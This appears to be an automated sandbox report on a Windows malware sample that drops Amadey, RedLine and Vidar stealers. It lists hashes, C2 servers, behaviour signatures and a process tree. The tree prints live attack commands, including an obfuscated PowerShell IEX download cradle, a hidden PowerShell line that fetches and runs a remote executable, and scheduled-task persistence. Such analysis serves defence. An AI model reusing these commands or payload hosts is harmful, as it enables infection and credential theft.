Resubmissions

09/01/2023, 12:57

230109-p64akahf8s 10

09/01/2023, 12:53

230109-p41rnahf7v 10

09/01/2023, 09:46

230109-lrmgqadg47 10

Analysis

  • max time kernel
    89s
  • max time network
    132s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/01/2023, 12:53

General

  • Target

    d4cb3f4a5554ec5411cc328cffb5ee564a2114446cbd2.exe

  • Size

    235KB

  • MD5

    ddfa4b4f9123e72e7b86f10cdd994a83

  • SHA1

    5efe2f2980c2fbb50d8f44271037293402667737

  • SHA256

    d4cb3f4a5554ec5411cc328cffb5ee564a2114446cbd2c9b27dd5125b15b30b4

  • SHA512

    0988ef4bb20ef54e7a8457241c4c207998c49c4664d83895e85d0359098e8c2337b6e31a2cce966516c91182604c8fc04d605c83340a569ea9fe77d7ddc71f9a

  • SSDEEP

    6144:KbxUDsiH4X/Et6xXQ31UrhfSK6uVyWVYVtGgUO:KbQOXUghSuVyWVE7

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://ciadecompras.com/stubs/Encoding.txt

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ciadecompras.com/stubs/Disable.txt

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://ciadecompras.com/SilverClient.exe

Extracted

Family

amadey

Version

3.65

C2

62.204.41.32/8bmdh3Slb2/index.php

77.73.134.27/8bmdh3Slb2/index.php

Extracted

Family

redline

Botnet

shura

C2

62.204.41.211:4065

Attributes
  • auth_value

    2f02f1c9ca2536317ad1d99107fe7cf1

Extracted

Family

redline

Botnet

Naskopro1001

C2

82.115.223.15:15486

Attributes
  • auth_value

    2758e9c533872760f08a9c6118f6721e

Extracted

Family

amadey

Version

3.63

C2

62.204.41.91/8kcnjd3da3/index.php

Extracted

Family

redline

Botnet

@REDLINEVIP Cloud (TG: @FATHEROFCARDERS)

C2

151.80.89.233:13553

Attributes
  • auth_value

    fbee175162920530e6bf470c8003fa1a

Extracted

Family

vidar

Version

1.8

Botnet

817

C2

https://t.me/year2023start

https://steamcommunity.com/profiles/76561199467421923

Attributes
  • profile_id

    817

Extracted

Family

redline

Botnet

1

C2

80.66.87.22:80

Attributes
  • auth_value

    988640d4b8a8e5204910f6d6a0e74af3

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect Amadey credential stealer module 1 IoCs
  • Detected phishing page
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Blocklisted process makes network request 12 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 26 IoCs
  • Sets file to hidden 1 TTPs 2 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks computer location settings 2 TTPs 10 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 10 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses Microsoft Outlook profiles 1 TTPs 7 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Detected potential entity reuse from brand microsoft.
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 7 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies registry class 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d4cb3f4a5554ec5411cc328cffb5ee564a2114446cbd2.exe
    "C:\Users\Admin\AppData\Local\Temp\d4cb3f4a5554ec5411cc328cffb5ee564a2114446cbd2.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2376
    • C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe
      "C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:2988
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe" /F
        3⤵
        • Creates scheduled task(s)
        PID:4632
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\588b4b1c98" /P "Admin:N"&&CACLS "..\588b4b1c98" /P "Admin:R" /E&&Exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4772
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          4⤵
            PID:4544
          • C:\Windows\SysWOW64\cacls.exe
            CACLS "nbveek.exe" /P "Admin:N"
            4⤵
              PID:4672
            • C:\Windows\SysWOW64\cacls.exe
              CACLS "nbveek.exe" /P "Admin:R" /E
              4⤵
                PID:5008
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                4⤵
                  PID:3416
                • C:\Windows\SysWOW64\cacls.exe
                  CACLS "..\588b4b1c98" /P "Admin:N"
                  4⤵
                    PID:3332
                  • C:\Windows\SysWOW64\cacls.exe
                    CACLS "..\588b4b1c98" /P "Admin:R" /E
                    4⤵
                      PID:4828
                  • C:\Users\Admin\AppData\Local\Temp\1000001051\portu.exe
                    "C:\Users\Admin\AppData\Local\Temp\1000001051\portu.exe"
                    3⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4536
                  • C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe
                    "C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe"
                    3⤵
                      PID:4332
                    • C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe
                      "C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:4016
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                        4⤵
                        • Adds Run key to start application
                        • Enumerates system info in registry
                        • Modifies registry class
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                        • Suspicious use of FindShellTrayWindow
                        PID:1788
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ffa687246f8,0x7ffa68724708,0x7ffa68724718
                          5⤵
                            PID:2272
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,195285305158153279,4104189012458036218,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
                            5⤵
                              PID:1492
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,195285305158153279,4104189012458036218,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
                              5⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:4520
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,195285305158153279,4104189012458036218,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2676 /prefetch:8
                              5⤵
                                PID:2768
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,195285305158153279,4104189012458036218,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
                                5⤵
                                  PID:4640
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,195285305158153279,4104189012458036218,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
                                  5⤵
                                    PID:4692
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2120,195285305158153279,4104189012458036218,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3860 /prefetch:8
                                    5⤵
                                      PID:1812
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,195285305158153279,4104189012458036218,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4800 /prefetch:1
                                      5⤵
                                        PID:3756
                                  • C:\Users\Admin\AppData\Local\Temp\1000003051\portu1.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1000003051\portu1.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4032
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 1224
                                      4⤵
                                      • Program crash
                                      PID:4636
                                  • C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe
                                    "C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2360
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 1208
                                      4⤵
                                      • Program crash
                                      PID:2428
                                  • C:\Users\Admin\AppData\Local\Temp\1000006001\anon.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1000006001\anon.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5056
                                  • C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe
                                    "C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    PID:4492
                                  • C:\Users\Admin\AppData\Local\Temp\1000012001\leman.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1000012001\leman.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Checks computer location settings
                                    PID:4968
                                    • C:\Users\Admin\AppData\Local\Temp\d003af69b2\nbveek.exe
                                      "C:\Users\Admin\AppData\Local\Temp\d003af69b2\nbveek.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      • Checks computer location settings
                                      PID:1436
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\d003af69b2\nbveek.exe" /F
                                        5⤵
                                        • Creates scheduled task(s)
                                        PID:4868
                                      • C:\Users\Admin\AppData\Local\Temp\1000001001\portu1.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1000001001\portu1.exe"
                                        5⤵
                                        • Executes dropped EXE
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4336
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4336 -s 1236
                                          6⤵
                                          • Program crash
                                          PID:5340
                                      • C:\Users\Admin\AppData\Local\Temp\1000005001\Player3.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1000005001\Player3.exe"
                                        5⤵
                                        • Executes dropped EXE
                                        • Checks computer location settings
                                        PID:3896
                                        • C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
                                          "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Checks computer location settings
                                          PID:3552
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
                                            7⤵
                                            • Creates scheduled task(s)
                                            PID:3200
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit
                                            7⤵
                                              PID:4824
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                8⤵
                                                  PID:1252
                                                • C:\Windows\SysWOW64\cacls.exe
                                                  CACLS "nbveek.exe" /P "Admin:N"
                                                  8⤵
                                                    PID:1716
                                                  • C:\Windows\SysWOW64\cacls.exe
                                                    CACLS "nbveek.exe" /P "Admin:R" /E
                                                    8⤵
                                                      PID:2824
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                      8⤵
                                                        PID:4928
                                                      • C:\Windows\SysWOW64\cacls.exe
                                                        CACLS "..\16de06bfb4" /P "Admin:N"
                                                        8⤵
                                                          PID:4892
                                                        • C:\Windows\SysWOW64\cacls.exe
                                                          CACLS "..\16de06bfb4" /P "Admin:R" /E
                                                          8⤵
                                                            PID:1884
                                                        • C:\Users\Admin\AppData\Local\Temp\1000015001\wj.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\1000015001\wj.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Checks computer location settings
                                                          PID:4532
                                                          • C:\Users\Admin\AppData\Local\Temp\1000015001\wj.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\1000015001\wj.exe" -h
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:4324
                                                        • C:\Users\Admin\AppData\Local\Temp\1000016001\pb1111.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\1000016001\pb1111.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:3356
                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
                                                          7⤵
                                                          • Loads dropped DLL
                                                          PID:2256
                                                          • C:\Windows\system32\rundll32.exe
                                                            "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
                                                            8⤵
                                                            • Loads dropped DLL
                                                            PID:3904
                                                            • C:\Windows\system32\WerFault.exe
                                                              C:\Windows\system32\WerFault.exe -u -p 3904 -s 680
                                                              9⤵
                                                              • Program crash
                                                              PID:3992
                                                    • C:\Users\Admin\AppData\Local\Temp\1000017001\40K.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1000017001\40K.exe"
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4660
                                                    • C:\Users\Admin\AppData\Local\Temp\1000022001\Guf.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1000022001\Guf.exe"
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      PID:1388
                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                        6⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5228
                                                    • C:\Users\Admin\AppData\Local\Temp\1000028001\vlc-3.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1000028001\vlc-3.exe"
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Checks computer location settings
                                                      PID:4184
                                                      • C:\Windows\System32\mshta.exe
                                                        "C:\Windows\System32\mshta.exe" https://ciadecompras.com/stubs/Encoding.txt
                                                        6⤵
                                                        • Blocklisted process makes network request
                                                        • Checks computer location settings
                                                        PID:936
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''https://ciadecompras.com/stubs/Disable.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
                                                          7⤵
                                                          • Blocklisted process makes network request
                                                          • Drops startup file
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5872
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file C:\Users\Public\Microsoft.ps1
                                                            8⤵
                                                            • Suspicious use of SetThreadContext
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:3532
                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                              #cmd
                                                              9⤵
                                                                PID:204
                                                                • C:\Windows\system32\cmd.exe
                                                                  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A6DF.tmp\A6E0.tmp\A6E1.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                                  10⤵
                                                                    PID:6124
                                                                    • C:\Windows\system32\cmd.exe
                                                                      Cmd /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://ciadecompras.com/SilverClient.exe','C:\ProgramData\ice.exe');Start-Process 'C:\ProgramData\ice.exe'
                                                                      11⤵
                                                                        PID:6064
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://ciadecompras.com/SilverClient.exe','C:\ProgramData\ice.exe');Start-Process 'C:\ProgramData\ice.exe'
                                                                          12⤵
                                                                          • Blocklisted process makes network request
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:5684
                                                                          • C:\ProgramData\ice.exe
                                                                            "C:\ProgramData\ice.exe"
                                                                            13⤵
                                                                            • Executes dropped EXE
                                                                            PID:4292
                                                                            • C:\Windows\System32\attrib.exe
                                                                              "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Programs"
                                                                              14⤵
                                                                              • Sets file to hidden
                                                                              • Views/modifies file attributes
                                                                              PID:1880
                                                                            • C:\Windows\System32\attrib.exe
                                                                              "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Programs\svchost.exe"
                                                                              14⤵
                                                                              • Sets file to hidden
                                                                              • Views/modifies file attributes
                                                                              PID:5368
                                                          • C:\Users\Admin\AppData\Local\Temp\1000035001\build.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\1000035001\build.exe"
                                                            5⤵
                                                            • Executes dropped EXE
                                                            • Checks computer location settings
                                                            • Loads dropped DLL
                                                            • Checks processor information in registry
                                                            PID:1660
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1000035001\build.exe" & exit
                                                              6⤵
                                                                PID:5960
                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                  timeout /t 6
                                                                  7⤵
                                                                  • Delays execution with timeout.exe
                                                                  PID:4048
                                                            • C:\Users\Admin\AppData\Local\Temp\1000038001\Facebook_Tool_vip.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\1000038001\Facebook_Tool_vip.exe"
                                                              5⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              PID:5680
                                                              • C:\Users\Admin\AppData\Local\Temp\1000038001\Facebook_Tool_vip.exe
                                                                "{path}"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2428
                                                            • C:\Users\Admin\AppData\Local\Temp\1000040001\bg77.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\1000040001\bg77.exe"
                                                              5⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              PID:5904
                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                6⤵
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                PID:5212
                                                                • C:\Windows\system32\rundll32.exe
                                                                  "C:\Users\Admin\AppData\Roaming\nsis_unse572172.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8E37AGkbADAAUQBv+wBUGwBjAHkAZvMARTsA8vEAAFlI|4PsKOgEAgAA|0iDxCjDzMzM|0yJRCQYSIlUfyQQSIlMJAhdAf9Ii0QkMEiJBO0kgQE4SG8ACEjHt0QkEC0B6w6BARCvSIPAAY8BEIEBQNtIOZYAcyWfA4sM|yRIA8hIi8FI64tMqwFUewAD0Uj|i8qKCYgI68F+ZgVlSIsEJWDz8P8zyUiLUBhIO||RdDZIg8IgSP+LAkg7wnQqZv+DeEgYdRpMi|9AUGZBgzhrdN0HERFLdQgREHgQ|y50BUiLAOvV10iLSP0AwWoAQFP|VVZXQVRBVUH3VkFXXQFmgTlN|1pNi|hMi|JI34vZD4X88|BMY|9JPEGBPAlQRd8AAA+F6vPwQYv3hAmI8|CFwEiN3zwBD4TWahGDvLsJjC0BD4TH8|BE|4tnIESLXxyL|3ckRItPGEwD|+FMA9lIA|Ezf8lFhckPhKQ5Af+LxEGLEEUz0v9IA9OKAoTAdP8dQcHKDQ++wN76AAFEA9C|EXXs|0GB+qr8DXx0|w6DwQFJg8AE|0E7yXNp68aL|8EPtwxORYss|4tMA+t0WDPtvqoQdFFBixTBANP|M8mKAkyLwuu3D8HJyBEDyOUQAfdBigDVEO0zwDOf9kE7DLbgEKYAg||GAYP4CHLu6|8KSIvLQf|VSd+JBPeDxeQQxATfO28Ycq9mAUFf|0FeQV1BXF9e+11bMxdIgexgAf5kAIvp6Gb+||+|SIXAD4SYdSBM9Y2vAYsrEMgz|+j9m30gjV8ETI1F|0Yz0ovL|1Qk|WiAIEyL4A+Ea3p1IEWoEDPAi9ORIF9IiXwkIKYgcIAgP0iL8A+ES3UgpiD|UEiNVghEjUffQEiNjCSFEUiL79jofP1+II1WSGreIBDiIczz8Ohn7yA|RIsGjVcIQSCmIL1YyiGJhCSAhxLe9vPwiw7aIFiJjCTYcREHMJEg6DHvIIuc|i0yTItdOkiD+|tsSIogMEyJZCTvOEyLpBoyTIlcboQBhCTchxGGko0Ru41HSzCMJPDz8Enfi9To6fwFMIqc7ngySI2EeDJBgPN|IY1PbEQwGKQCf4PpAXXzgbx4Mv8hUmV4dU2LhLsk9CIxlCT4NQHC|0g72HI4g|psv3YzRI1JQPoAlKdBuACYAKYgQMoi+Od0GUS2MMAxSY1U+yRskSBJg+hs6N1rgjBIi86mIHhI|4X|dBKLVUJM|I4wGzFIjUwkQP8P10iBxHQhYSQtCC0B
                                                                  7⤵
                                                                  • Blocklisted process makes network request
                                                                  • Loads dropped DLL
                                                                  • Accesses Microsoft Outlook profiles
                                                                  • Checks processor information in registry
                                                                  • outlook_office_path
                                                                  PID:5004
                                                                  • C:\Windows\system32\WerFault.exe
                                                                    C:\Windows\system32\WerFault.exe -u -p 5004 -s 616
                                                                    8⤵
                                                                    • Program crash
                                                                    PID:1528
                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                              "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                                              5⤵
                                                              • Blocklisted process makes network request
                                                              • Loads dropped DLL
                                                              • Accesses Microsoft Outlook profiles
                                                              • outlook_win_path
                                                              PID:5356
                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                                                          3⤵
                                                          • Loads dropped DLL
                                                          PID:5476
                                                          • C:\Windows\system32\rundll32.exe
                                                            "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                                                            4⤵
                                                            • Loads dropped DLL
                                                            PID:1408
                                                            • C:\Windows\system32\WerFault.exe
                                                              C:\Windows\system32\WerFault.exe -u -p 1408 -s 692
                                                              5⤵
                                                              • Program crash
                                                              PID:5816
                                                    • C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe
                                                      C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe
                                                      1⤵
                                                      • Executes dropped EXE
                                                      PID:3156
                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                      1⤵
                                                        PID:420
                                                      • C:\Windows\system32\taskmgr.exe
                                                        "C:\Windows\system32\taskmgr.exe" /4
                                                        1⤵
                                                        • Checks SCSI registry key(s)
